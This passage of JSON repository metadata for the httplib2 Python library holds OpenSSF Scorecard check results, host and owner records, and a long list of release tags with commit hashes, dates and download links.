pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/